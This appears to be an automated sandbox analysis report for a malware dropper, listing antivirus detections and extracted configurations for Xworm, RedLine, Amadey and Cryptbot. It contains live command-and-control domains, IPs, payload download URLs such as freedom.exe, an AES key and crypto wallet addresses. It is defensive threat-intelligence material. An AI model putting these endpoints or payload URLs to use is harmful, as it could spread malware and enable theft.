                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exeAvira: detection malicious, Label: HEUR/AGEN.1319014
                        Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeAvira: detection malicious, Label: TR/Crypt.XDR.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                        Source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
                        Source: 31.3.build2.exe.2b60000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "193.176.158.185/B0kf3CbAbR/index.php", "Version": "4.41", "Install Folder": "fed0c9a4d3", "Install File": "Hkbsse.exe"}
                        Source: 3546345.exe.7096.37.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["POST13vt.top", "analforeverlovyu.top", "+#thizx13vt.top", "13vt.top", "thizx13vt.top", "t.top", "+thizx13vt.top"]}
                        Source: thizx13vt.topVirustotal: Detection: 5%Perma Link
                        Source: 95.179.163.21:29257Virustotal: Detection: 8%Perma Link
                        Source: http://185.216.214.225/freedom.exeVirustotal: Detection: 20%Perma Link
                        Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeReversingLabs: Detection: 91%
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeReversingLabs: Detection: 84%
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeReversingLabs: Detection: 87%
                        Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeReversingLabs: Detection: 84%
                        Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exeReversingLabs: Detection: 39%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exeReversingLabs: Detection: 100%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exeReversingLabs: Detection: 70%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exeReversingLabs: Detection: 86%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeReversingLabs: Detection: 100%
                        Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exeReversingLabs: Detection: 86%
                        Source: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exeReversingLabs: Detection: 70%
                        Source: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exeReversingLabs: Detection: 39%
                        Source: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\Windows.exeReversingLabs: Detection: 84%
                        Source: wfJfUGeGT3.exeReversingLabs: Detection: 13%
                        Source: wfJfUGeGT3.exeVirustotal: Detection: 13%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exeJoe Sandbox ML: detected
                        Source: wfJfUGeGT3.exeJoe Sandbox ML: detected
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: exonic-hacks.com
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: 1920
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: <123456789>
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: <Xwormmm>
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: NewAged
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: USB.exe
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: %Userprofile%
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: Windows.exe
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: bc1qvjral4f3vdvgp4ep5al5a08zxl3ympwr208tef
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: 0x8bF11EF53522Af8409ed77b05B1C5A0059F14571
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpackString decryptor: TRC20_Address

                        Compliance

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeUnpacked PE file: 31.2.build2.exe.400000.0.unpack
                        Source: wfJfUGeGT3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: wfJfUGeGT3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_004062EB FindFirstFileW,FindClose,0_2_004062EB
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CB1
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00614005
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0061C2FF
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0061494A
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061CD14 FindFirstFileW,FindClose,19_2_0061CD14
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0061CD9F
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0061F5D8
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0061F735
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0061FA36
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00613CE2
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CC38B4 FindFirstFileExW,24_2_00CC38B4
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_007638B4 FindFirstFileExW,27_2_007638B4
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_004415EE FindFirstFileExW,31_2_004415EE
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B31855 FindFirstFileExW,31_2_02B31855
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\591950\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\591950Jump to behavior

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: exonic-hacks.com
                        Source: Malware configuration extractorIPs: 193.176.158.185
                        Source: Malware configuration extractorURLs: POST13vt.top
                        Source: Malware configuration extractorURLs: analforeverlovyu.top
                        Source: Malware configuration extractorURLs: +#thizx13vt.top
                        Source: Malware configuration extractorURLs: 13vt.top
                        Source: Malware configuration extractorURLs: thizx13vt.top
                        Source: Malware configuration extractorURLs: t.top
                        Source: Malware configuration extractorURLs: +thizx13vt.top
                        Source: Malware configuration extractorURLs: 95.179.163.21:29257
                        Source: Yara matchFile source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
                        Source: Yara matchFile source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\Windows.exe, type: DROPPED
                        Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
                        Source: Joe Sandbox ViewIP Address: 185.215.113.19 185.215.113.19
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_006229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_006229BA
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\jq equals www.youtube.com (Youtube)
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\jq equals www.youtube.com (Youtube)
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,jq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                        Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/Jhiidutz.exe
                        Source: Cerker.exe, 00000022.00000003.3805623513.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.4037312002.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.4094207882.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3820865789.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3842369275.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/Jhiidutz.exee
                        Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4190412440.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/freedom.exe
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/freedom.exe-
                        Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/freedom.exej
                        Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.225/freedom.exeryWt.exe
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                        Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: wfJfUGeGT3.exe, BowExpert.exe.11.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://ocsp.entrust.net02
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://ocsp.entrust.net03
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003411000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000336A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
